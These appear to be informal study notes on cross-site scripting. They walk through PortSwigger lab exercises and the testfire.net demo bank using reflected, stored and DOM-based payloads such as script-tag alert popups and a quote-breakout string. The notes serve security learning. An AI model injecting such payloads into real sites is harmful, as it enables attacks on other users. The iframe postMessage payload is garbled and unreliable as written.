Cross-site Scripting [XSS]

Cross-site scripting is a type of computer security 
vulnerability typically found in web applications.
-------------------------------------------------------
----------------------------------------------------------
===========================================================
 XSS enables attackers to 
inject client-side scripts into web pages viewed by other 
users.

types of XSS:

- Reflected XSS 
- Stored XSS
- Dom Based XSS
-----------------
Reflected XSS involves injecting HTML/JavaScript code into 
a website's search bar so that it is not treated as a search 
parameter but as part of the website, and responds accordingly.
---
eg. Write a script in a Search Box. like -
<script>alert()</script> [payload]
----------------

--------------------------------------------------------
online lab plateform called - 
https://portswigger.net/
create account
academy
all labs
scroll down 
cross site scripting
-----------------------------------------------------------------------------------------
=========================================================================================
=========================================================================================
lab - 1
-------
https://portswigger.net/
-------------------------
[reflected cross-site scripting - vulnerability-
search functionality- alert function]
appear - BLOG 
------------
Write a script in a Search Box. like -
<script>alert()</script> [payload]
----------------- 
popup will show
------------------------------
[<script>at beginning]
[here alert() is a functon and use
to show popup in website
and pop means execution successful]
[<script>at end]
------------------------------
Script tag used for injecting the javascript in
HTML page
----------------------------------------------------------------------------------------------
==============================================================================================
==============================================================================================
lab - 2
-------
https://portswigger.net/
-------------------------
stored cross site scripting
- open post
- comment there with below script
<script>alert("hello")</script>
- If you reload the page, you will see an alert.
Open inspect; the script becomes an executable part of the site but not as a comment.
----------------------------------------------------------------------------------------------
==============================================================================================
==============================================================================================
Lab - 3

https://portswigger.net/
-------
 Document Object Model (DOM) - 

https://0a9200a2034ea6c0809d6c42009c0068.web-security-academy.net/?search=hello
- search hello 
- right click and open inspect 
- search there 'hello// and found then click  (page differently behave then it would be vulnerable )
1 
'hello//
2
">hello
3
"><script>alert(om)</script>
===================================================================================
===================================================================================
===================================================================================
===================================================================================
DOM XSS Using Web Messages
steps - -------
https://portswigger.net/web-security/dom-based/controlling-the-web-message-source/lab-dom-xss-using-web-messages
Lab: DOM XSS using web messages -> ACCESS THE LAB-> click 
on next page -> slect home -> right click -. inspect and view source page->and click -> go to exploit server ->  
on next page -> go to - body - > Hello, world! - clear it 
and write or paste there below text ---

<iframe src="https://0a9000e4038053fd80ea53e20071000f.web-security-academy.net/" onload="this.contentWindow.postMessager("<script>console.log(1)</script>','*')">
note - every time you need to replace above written url with previous page url and other 
text should remain same....

click - view exploit 


===========================
===========================
===========================
-------------------------------------------------------
==================================================
==================================================
first google - AltroMutual
    
[vulnerable/testing banking website] 
http://testfire.net/
----------------------------
in this website, in search bar find out input 
that should be reflected in output 
like - 
search - hlo
output came -
no result were found for the query:
hlo
-----------------------------------------------
so in this scenario we will inject the script

<script>alert("hello")</script>

[if ou it this in chrom then script will block]
so we can try to do it in internet explorer/any other
------------------------------------------------------
in feedback - insert random data in
-------------------------------------
Your Name:           <script>alert("Om Kant")</script>	
Your Email Address:  om@gmail.com	
Subject: 	     ethical
Question/Comment:    reflect
------------------------------------------------------
then - pop up will appear - 

testfire.net
Om Kant

-----------------------------------------------------
after pop-up 
website output- 

Thank You

Thank you for your comments, . They will be reviewed 
by our Customer  Service staff and given the full 
attention that they deserve. Our reply will be sent
to your email: om@gmail.com

----------------------------------------------------
----------------------------------------------------
====================================================
====================================================
====================================================
portswigger
 Document Object Model (DOM) - 

https://0a9200a2034ea6c0809d6c42009c0068.web-security-academy.net/?search=hello
- search hello 
- right click and open inspect 
- search there 'hello// and found then click  (page differently behave then it would be vulnerable )
1 
'hello//
2
">hello
3
"><script>alert(om)</script>
------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------
webpage text -
--------------
<html>
    <head>
        <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
        <link href=/resources/css/labsBlog.css rel=stylesheet>
        <title>DOM XSS in document.write sink using source location.search</title>
    </head>
    <body>
        <script src="/resources/labheader/js/labHeader.js"></script>
        <div id="academyLabHeader">
            <section class='academyLabBanner'>
                <div class=container>
                    <div class=logo></div>
                        <div class=title-container>
                            <h2>DOM XSS in <code>document.write</code> sink using source <code>location.search</code></h2>
                            <a class=link-back href='https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sink'>
                                Back&nbsp;to&nbsp;lab&nbsp;description&nbsp;
                                <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
                                    <g>
                                        <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
                                        <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
                                    </g>
                                </svg>
                            </a>
                        </div>
                        <div class='widgetcontainer-lab-status is-notsolved'>
                            <span>LAB</span>
                            <p>Not solved</p>
                            <span class=lab-status-icon></span>
                        </div>
                    </div>
                </div>
            </section>
        </div>
        <div theme="blog">
            <section class="maincontainer">
                <div class="container is-page">
                    <header class="navigation-header">
                        <section class="top-links">
                            <a href=/>Home</a><p>|</p>
                        </section>
                    </header>
                    <header class="notification-header">
                    </header>
                    <section class=blog-header>
====================================================================================================
                        <h1>0 search results for 'hello'</h1>
====================================================================================================
                        <hr>
                    </section>
                    <section class=search>
                        <form action=/ method=GET>
                            <input type=text placeholder='Search the blog...' name=search>
                            <button type=submit class=button>Search</button>
                        </form>
                    </section>
                    <script>
======================================================================================================================================
                        function trackSearch(query) {
                            document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');            
                        }
---------------------------------------------------------------------------------------------------------------------------------------
 '+query+'">'  need to crack it
so we use in web search box 
https://0a9200a2034ea6c0809d6c42009c0068.web-security-academy.net/?search=hello
">hello         
(">hello   incert it to see web vulnerable or not, then use alert )
-----------------------
output-  

0 search results for '">hello'     -output above  search box -

hello">                            -output below  search box -
---------------------------
then use in web search box - - use script like - 
"><script>alert()</script>
or
"><script>alert()</script>   
(popup will come)
---------------------------------------
0 search results for '"><script>alert()</script>'

=====================================================================================================
                        var query = (new URLSearchParams(window.location.search)).get('search');
                        if(query) {
                            trackSearch(query);
                        }
                    </script>
                    <section class="blog-list no-results">
                        <div class=is-linkback>
        <a href="/">Back to Blog</a>
                        </div>
                    </section>
                </div>
            </section>
            <div class="footer-wrapper">
            </div>
        </div>
    </body>
</html>
----- 

























--------------------------------
reference
DOM-BASED XSS LAB SOLVED IN HINDI - DOM XSS ATTACK - how to break dom 
